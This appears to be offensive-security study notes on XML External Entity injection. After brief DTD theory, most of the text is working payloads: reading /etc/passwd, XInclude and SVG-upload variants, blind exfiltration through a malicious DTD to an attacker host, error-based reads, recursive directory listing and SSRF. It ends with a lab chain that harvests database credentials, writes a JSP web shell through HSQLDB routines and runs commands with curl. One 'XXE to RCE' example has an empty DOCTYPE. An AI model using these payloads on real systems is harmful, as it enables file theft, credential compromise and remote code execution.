XML External Entity (XXE) Injection

XML is a markup language designed to encode data in a form that is readable by both humans and machines. An XML document looks similar to an HTML document, although the two differ in syntax rules and in how they are processed.

An application that relies on data stored in the XML format will inevitably make use of an XML parser or processor. The application calls this component whenever XML data needs to be processed. XML processors can suffer from several types of vulnerabilities triggered by malformed or malicious input, such as information disclosure, server-side request forgery, denial of service, and remote command injection.

Theory

- XML Entities in DTDs

  • DTDs can declare XML entities in XML documents.

  • XML entities are named units of content (text or markup) that can be referenced multiple times in a document.

  • Three types of XML entities: internal, external (private and public), and parameter.

Internal Entities:

  • Locally defined

  • Format: <!ENTITY name "entity_value">

  • Example: <!ENTITY test "<entity-value>test value</entity-value>">
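To see entity replacement in action, the example entity can be parsed with Python's standard library. This is only a minimal sketch: the `data` root element is a hypothetical wrapper added for the demo, and other parsers may behave differently.

```python
import xml.etree.ElementTree as ET

# Internal entity declared in the DTD and referenced once in the body.
# The <data> root element is a hypothetical wrapper used only for this demo.
DOC = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY test "<entity-value>test value</entity-value>">
]>
<data>&test;</data>"""

root = ET.fromstring(DOC)

# The parser substitutes &test; with the entity's markup,
# so <data> ends up with an <entity-value> child element.
child = root.find("entity-value")
print(child.text)
```

The reference `&test;` never reaches the application; it only sees the substituted content.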

External Entities:

  • Used for referencing data not defined locally.

  • Private external entity format: <!ENTITY name SYSTEM "URI">

  • Example of private external entity: <!ENTITY hola SYSTEM "http://www.example.com/company.xml">

  • Public external entity format: <!ENTITY name PUBLIC "public_id" "URI">

  • Example of public external entity: <!ENTITY hola PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.example.com/companyinfo.xml">

Parameter Entities:

  • Exist only within DTDs.

  • Format: <!ENTITY % name "value"> (internal) or <!ENTITY % name SYSTEM "URI"> (external)

  • Example: <!ENTITY % course 'AWAE'>, <!ENTITY Title 'Offensive Security presents %course;' >

Unparsed External Entities:

  • XML entities can contain non-XML data.

  • Use NDATA declaration to prevent XML parser processing.

  • Format for public and private external entities: <!ENTITY name SYSTEM "URI" NDATA TYPE> or <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>.

  • Allows access to binary content, useful in web application environments lacking I/O stream manipulation flexibility.

- XML External Entity (XXE) injection is an attack against XML parsers

  • Attacker forces the XML parser to process external entities.

  • Can lead to disclosure of confidential information.

  • Requires maliciously-crafted XML request with system identifiers pointing to sensitive data.

  • Can be used to exfiltrate data, including binary content.

  • Depending on the application's programming language and protocol wrappers, may lead to command injection.

  • In some languages like PHP, XXE can result in remote code execution.

- Finding the Attack Vector

  • Demonstrates XXE attack with examples.

  • XML parser replaces entity reference with entity's value.

  • Changing an internal entity to an external entity referencing a file on the server can lead to reading server files.

  • Vulnerable parsers load file contents and place them in the XML document.

  • XXE payload should be injected into a field displayed in the web application.

  • Suggested target: Accounts page with XML input, where XXE payloads can be used in text fields to observe attack results in the web application.

XXE to retrieve files or obtain data

To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways: introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file, and edit a data value in the XML that is returned in the application's response so that it makes use of the defined external entity.

- No Defenses Applied from the App

Normal Request:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
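The two modifications can be sketched as a small string transformation. The function name `build_xxe_payload` and its parameters are hypothetical; it assumes the value to replace appears as plain element text in the request.

```python
def build_xxe_payload(xml_body: str, target_value: str, file_uri: str) -> str:
    """Add a DOCTYPE defining &xxe; and swap one data value for the reference."""
    doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>'

    # Keep the XML declaration (if any) as the very first thing in the document.
    decl_end = xml_body.find("?>")
    if xml_body.startswith("<?xml") and decl_end != -1:
        head, tail = xml_body[: decl_end + 2], xml_body[decl_end + 2 :]
    else:
        head, tail = "", "\n" + xml_body

    # Replace only the first occurrence of the chosen element text.
    tail = tail.replace(f">{target_value}<", ">&xxe;<", 1)
    return f"{head}\n{doctype}{tail}" if head else f"{doctype}{tail}"


normal_request = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<stockCheck><productId>381</productId></stockCheck>"
)
print(build_xxe_payload(normal_request, "381", "file:///etc/passwd"))
```

Only the field that is reflected in the response is worth replacing; other fields would hide the result.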

- XInclude to retrieve files

Some applications receive client-submitted data, embed it on the server side into an XML document, and then parse the document. In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a W3C specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
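Because the XInclude snippet travels inside an ordinary data value, it usually has to be URL-encoded into a form body. The following is a minimal sketch; the field names `productId` and `storeId` are assumptions used for illustration.

```python
from urllib.parse import urlencode

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def xinclude_value(file_uri: str) -> str:
    """Build the XInclude element that is sent as a single data value."""
    return (
        f'<foo xmlns:xi="{XINCLUDE_NS}">'
        f'<xi:include parse="text" href="{file_uri}"/></foo>'
    )


def form_body(field: str, file_uri: str, **other_fields: str) -> str:
    """URL-encode a form body in which one field carries the XInclude value."""
    return urlencode({field: xinclude_value(file_uri), **other_fields})


# Hypothetical field names; adjust to the parameters of the real request.
print(form_body("productId", "file:///etc/passwd", storeId="1"))
```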

- XXE attacks via modified content type

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
…………………
foo=bar

Then you might be able to submit the following request, with the same result:

POST /action HTTP/1.0
Content-Type: text/xml
…………………
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use XML.
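The conversion from a form-encoded body to an XML body can be sketched as follows. The helper `form_to_xml` is hypothetical, and wrapping several parameters in a `root` element is an assumption; the real element layout depends on what the application accepts.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape


def form_to_xml(form_body: str, root: str = "root") -> str:
    """Convert 'a=1&b=2' style data into an XML request body."""
    pairs = parse_qsl(form_body, keep_blank_values=True)
    elements = "".join(
        f"<{name}>{escape(value)}</{name}>" for name, value in pairs
    )
    # A single parameter becomes the document element itself;
    # several parameters are wrapped in an assumed root element.
    if len(pairs) != 1:
        elements = f"<{root}>{elements}</{root}>"
    return f'<?xml version="1.0" encoding="UTF-8"?>{elements}'


print(form_to_xml("foo=bar"))
```

The result is sent with `Content-Type: text/xml` in place of the original content type.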

- XXE via image file upload

Create a local SVG image with the following content:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Upload the image. When you then view your comment, avatar, or image, the contents of the /etc/hostname file should be rendered inside it.

- Blind XXE with out-of-band (OOB) interaction

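Sometimes regular entities are blocked by input validation or parser hardening. In that case, XML parameter entities can be used instead. They differ from regular entities in two ways. First, the declaration of an XML parameter entity includes the percent character before the entity name: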

<!DOCTYPE foo [ <!ENTITY % myparameterentity "my parameter entity value" > ]>

And second, parameter entities are referenced using the percent character instead of the usual ampersand:

%myparameterentity;

If this and other XML injections do not work, try an out-of-band XXE that loads an external URL under our control (Burp Collaborator, ngrok, …):

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>

If nothing is shown in the response but our server receives a request, the target is vulnerable to blind XXE with out-of-band (OOB) interaction.

From here we can, for example, host a malicious DTD on the attacker-controlled server and have the parser load it.
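If Burp Collaborator or a tunnel is not available, the hit can be observed with a small listener. This is a minimal sketch built on Python's standard `http.server`; the function name `start_listener` and the default port are assumptions.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def start_listener(host: str = "0.0.0.0", port: int = 8000):
    """Start a background HTTP server and return (server, hits).

    Every GET request is recorded in `hits` as (client_ip, path).
    """
    hits = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Record the interaction before answering the parser.
            hits.append((self.client_address[0], self.path))
            self.send_response(200)
            self.send_header("Content-Length", "0")
            self.end_headers()

        def log_message(self, fmt, *args):
            pass  # stay quiet; interactions are kept in `hits`

    server = HTTPServer((host, port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, hits
```

After sending the payload, a non-empty `hits` list confirms the out-of-band interaction; call `server.shutdown()` when done.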

- Blind XXE to exfiltrate data using a malicious external DTD

First, we create a malicious DTD:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://web-attacker.com/?file=%file;'>">
%eval;
%exfil;

Then, in the request, we reference the URL of the server that hosts the malicious DTD:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe; ]>

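Because the DTD uses php://filter (a PHP-specific wrapper), the file contents arrive base64-encoded in the file parameter. Decode the received value:

echo "{blob received}" | base64 -d; echo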
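The decoding step can also be done on the request path logged by the attacker's server. A minimal sketch, assuming the data arrives in a query parameter named `file` as in the DTD above; the helper name `decode_exfil` is hypothetical.

```python
import base64
from urllib.parse import parse_qs, urlparse


def decode_exfil(request_path: str, param: str = "file") -> str:
    """Extract and decode the base64 blob from a logged request path."""
    query = parse_qs(urlparse(request_path).query)
    blob = query[param][0]
    # Query-string parsing turns '+' into a space; restore it for base64.
    blob = blob.replace(" ", "+")
    # Re-add padding in case it was stripped in transit.
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


# Example with a locally generated value (not real exfiltrated data).
sample = base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
print(decode_exfil(f"/?file={sample}"))
```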

- Blind XXE to retrieve data via error messages

An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

We then invoke it in the same way as in Blind XXE with out-of-band (OOB) interaction, by referencing the external DTD from the request. This results in an error message that reveals the contents of the target file.

- Blind XXE by repurposing a local DTD

When out-of-band connections are blocked, an alternative is to invoke a DTD file that happens to exist on the local filesystem and repurpose it: redefine an existing entity in a way that triggers a parsing error containing sensitive data.

First, we have to locate an existing DTD file to repurpose. We can test common DTD paths one at a time; the following payload causes an error if the file is missing:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
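Testing several candidate paths is easier with generated payloads. This is a sketch only: apart from the yelp path from the example, the candidate list is an assumption and should be replaced with paths that fit the target system.

```python
CANDIDATE_DTDS = [
    "/usr/share/yelp/dtd/docbookx.dtd",     # path used in the example above
    "/usr/share/xml/fontconfig/fonts.dtd",  # assumption: often present with fontconfig
]


def probe_payload(dtd_path: str) -> str:
    """Build a DOCTYPE that only loads the given local DTD."""
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        "%local_dtd;\n"
        "]>"
    )


def probe_payloads(paths=CANDIDATE_DTDS) -> dict:
    """Map each candidate path to its probe payload."""
    return {path: probe_payload(path) for path in paths}


for path, payload in probe_payloads().items():
    print(f"# {path}\n{payload}\n")
```

Each payload is sent separately; a path whose payload does not produce a file-not-found error is a candidate for repurposing.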

Then, we need to obtain a copy of the file and review it to find an entity that we can redefine. Since many common systems that include DTD files are open source, you can normally obtain a copy quickly through an internet search.

For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
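The nested escaping in the hybrid DTD is easy to get wrong by hand, so it can help to generate it. A minimal sketch; the function name `hybrid_dtd` and its parameters are hypothetical, and the output mirrors the payload above.

```python
def hybrid_dtd(local_dtd: str, entity: str, target: str) -> str:
    """Build a hybrid DTD that redefines `entity` from a local DTD file.

    Escaping levels inside the redefined entity value:
      &#x25;      -> '%' after the first expansion
      &#x26;#x25; -> '&#x25;' after the first expansion, '%' after the second
      &#x27;      -> "'" (avoids closing the outer single-quoted value)
    """
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{local_dtd}">\n'
        f"<!ENTITY % {entity} '\n"
        f'<!ENTITY &#x25; file SYSTEM "file://{target}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        '&#x27;file:///nonexistent/&#x25;file;&#x27;>">\n'
        "&#x25;eval;\n"
        "&#x25;error;\n"
        "'>\n"
        "%local_dtd;\n"
        "]>"
    )


print(hybrid_dtd("/usr/local/app/schema.dtd", "custom_entity", "/etc/passwd"))
```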

Information Disclosure

- File Reading

Use a POST request to /account with "application/xml" as the request body format.

Inspect sample objects in the model and find a simple example to use in the POST body.

Modify the POST request to include a simple DOCTYPE and ENTITY for testing.

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Replaced">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

Once we notice internal entities are being parsed successfully, we will attempt to use an external entity to reference a file on the server:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Enumerate contents of directories

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY directory SYSTEM "file:///etc/">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&directory;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>
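When the directory listing is reflected in the response, it can be split into individual entries. This sketch assumes the listing comes back as one entry per line inside the lastName element; the sample response is made up for illustration.

```python
import xml.etree.ElementTree as ET


def extract_listing(response_xml: str, tag: str = "lastName") -> list:
    """Return the non-empty lines found in the first <tag> element."""
    root = ET.fromstring(response_xml)
    node = root if root.tag == tag else root.find(f".//{tag}")
    if node is None or not node.text:
        return []
    return [line.strip() for line in node.text.splitlines() if line.strip()]


# Hypothetical response body, used only to demonstrate the parsing.
sample_response = (
    "<org.opencrx.kernel.account1.Contact>"
    "<lastName>hosts\npasswd\nshadow\n</lastName>"
    "<firstName>Tom</firstName>"
    "</org.opencrx.kernel.account1.Contact>"
)
print(extract_listing(sample_response))
```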

- Enumerate the whole server's file system through recursive XXE attack

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % file SYSTEM "file:///">
<!ENTITY % recursive "<!ENTITY &#37; allfiles SYSTEM 'file:///%file;'>
%allfiles;
">
%recursive;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&allfiles;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Script to cleanly display XXE attack results

import requests
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom

# Replace with the URL of the vulnerable API endpoint
url = "http://example.com/vulnerable_api_endpoint"

# Define the XXE payload. The backslash after the opening quotes keeps the
# XML declaration at the very start of the body; a leading newline before
# "<?xml" would make the document malformed.
xxe_payload = """\
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&lastname;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>
"""

# Send the XXE payload as a POST request (the timeout avoids hanging forever)
response = requests.post(
    url,
    data=xxe_payload,
    headers={"Content-Type": "application/xml"},
    timeout=10,
)

# Check if the request was successful
if response.status_code == 200:
    try:
        # Parse the XML response
        root = ET.fromstring(response.content)
    except ET.ParseError:
        # The response is not well-formed XML; show it unmodified
        print(response.text)
    else:
        # Pretty-print the XML response in human-readable form
        xml_str = ET.tostring(root, encoding="unicode")
        print(minidom.parseString(xml_str).toprettyxml())
else:
    print(f"XXE attack failed (HTTP {response.status_code})")

- File Reading using CDATA Sections

Directly reading files via XXE can cause parser errors if the file contains XML-specific characters like "<" and ">".

The solution is to use CDATA sections, which make the parser treat the file contents as text rather than markup. A CDATA section starts with <![CDATA[ and ends with ]]>.
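The effect of CDATA can be reproduced locally with Python's standard parser. In this sketch, `FILE_CONTENT` is a made-up fragment standing in for a file that contains markup characters.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content with an unbalanced tag, as a raw file might have.
FILE_CONTENT = '<role rolename="manager"'


def parsed_text(xml_text: str):
    """Return the element text, or None if the document is not well-formed."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        return None


# Substituting the file directly breaks the document.
raw = f"<lastName>{FILE_CONTENT}</lastName>"
# Wrapping the same content in CDATA makes it plain text.
wrapped = f"<lastName><![CDATA[{FILE_CONTENT}]]></lastName>"

print(parsed_text(raw))
print(parsed_text(wrapped))
```

The first call fails to parse, while the second returns the content unchanged.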

First, create a malicious DTD on the attacker's server:

sudo cat /var/www/html/wrapper.dtd

<!ENTITY wrapper "%start;%file;%end;">

Now, update the payload to reference this DTD:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/apache-tomee-plus7.0.5/conf/tomcat-users.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd"
> %dtd;
]>
<!-- The original request body follows; the entity reference is placed in one of its fields -->
<org.opencrx.kernel.account1.Contact>
	<lastName>&wrapper;</lastName>
	<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

- Enumerate contents of directories using CDATA Sections

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd"
> %dtd;
]>

XXE to perform SSRF attacks

In this XXE + SSRF attack, once you have discovered internal IP addresses or ports through SSRF, you use an XXE payload whose external entity points at the internal URL:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

XXE to RCE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
 
]>
<root>
 <name>John</name>
 <tel>test</tel>
 <email>START__END</email>
 <password>test</password>
</root>

- Tomcat and openCRX RCE through XXE and HSQLDB database access

First, we exploited XXE to read tomcat-users.xml for credentials, but could not leverage it to access Tomcat Manager due to role restrictions.

Using XXE we obtained directory listings, leading to the discovery of database-related files and credentials at /home/student/crx/data/hsqldb/.

Then, we found a JDBC connection string in the dbmanager.sh file, indicating the use of HSQLDB, together with the credentials: username sa and password manager99.

To check database accessibility:

nmap -p 9001 [server IP]
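If nmap is not at hand, the same reachability check can be done with a plain TCP connect. A minimal sketch; the function name `port_open` is hypothetical.

```python
import socket


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and resolution failures.
        return False
```

For the database above, this would be called as `port_open("[server IP]", 9001)` with the real address filled in.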

To connect to HSQLDB:

java -cp hsqldb.jar org.hsqldb.util.DatabaseManagerSwing --url jdbc:hsqldb:hsql://opencrx:9001/CRX --user sa --password manager99

Once connected to the database, we can use HSQLDB's Java Language Routines (JRTs), which allow SQL to call static Java methods:

CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Then, we will use the writeBytesToFilename method from com.sun.org.apache.xml.internal.security.utils.JavaUtils to write files to the server (convert payload to bytes using Burp Suite's Decoder tool):

CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Then, create a JSP web shell to execute commands on the server (Kali includes a default JSP web shell at /usr/share/webshells/jsp/cmdjsp.jsp):

call writeBytesToFilename('path/to/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))

call writeBytesToFilename('../../apache-tomee-plus-7.0.5/apps/opencrx-coreCRX/opencrx-core-CRX/shell.jsp', cast ('[converted shell content]' AS VARBINARY(1024)))
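The conversion done with Burp Suite's Decoder can also be scripted. This sketch assumes that the converted content is the ASCII-hex encoding of the shell's bytes, which is how a string cast to VARBINARY is expected to be interpreted here; the helper name `write_call` is hypothetical.

```python
def write_call(filename: str, payload: bytes, limit: int = 1024) -> str:
    """Build the HSQLDB call that writes `payload` to `filename`.

    Assumption: the database interprets the quoted string as hex
    when casting it to VARBINARY.
    """
    if len(payload) > limit:
        # The procedure above was declared with VARBINARY(1024).
        raise ValueError(f"payload is {len(payload)} bytes, limit is {limit}")
    hex_blob = payload.hex()
    safe_name = filename.replace("'", "''")  # escape quotes for SQL
    return (
        f"call writeBytesToFilename('{safe_name}', "
        f"cast ('{hex_blob}' AS VARBINARY({limit})))"
    )


# Tiny placeholder payload; a real JSP shell would be read from a file.
print(write_call("path/to/shell.jsp", b"<% %>"))
```

A shell larger than the declared size would need a procedure declared with a larger VARBINARY length.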

Now, we can access the uploaded JSP shell via browser or curl:

curl "http://opencrx:8080/path/to/shell.jsp?cmd=[command]"
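Commands that contain spaces or shell metacharacters must be URL-encoded before they are placed in the cmd parameter. A minimal sketch; the helper name `shell_url` is hypothetical.

```python
from urllib.parse import quote, urlencode


def shell_url(base: str, command: str) -> str:
    """Return the web shell URL with the command safely percent-encoded."""
    return f"{base}?{urlencode({'cmd': command}, quote_via=quote)}"


print(shell_url("http://opencrx:8080/path/to/shell.jsp", "id; uname -a"))
```

The resulting URL can be passed to curl in quotes or opened in a browser.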
